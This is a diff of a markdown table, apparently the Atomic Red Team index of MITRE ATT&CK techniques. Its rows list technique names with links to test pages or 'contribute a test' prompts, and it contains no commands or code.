-| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
-| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
-| | | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
-| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Account Manipulation](../../T1098/T1098.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
-| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) | | | | | | |
-| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | | | | | | | |
-| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
-| | | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
-| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | | | | | | | |
-| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
-| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
-| | | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
-| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
-| | | [IIS Components](../../T1505.004/T1505.004.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
-| | | [Event Triggered Execution](../../T1546/T1546.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
-| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
-| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
-| | | [BITS Jobs](../../T1197/T1197.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
-| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
-| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
-| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
-| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
-| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
-| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
-| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
-| | | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
-| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
-| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
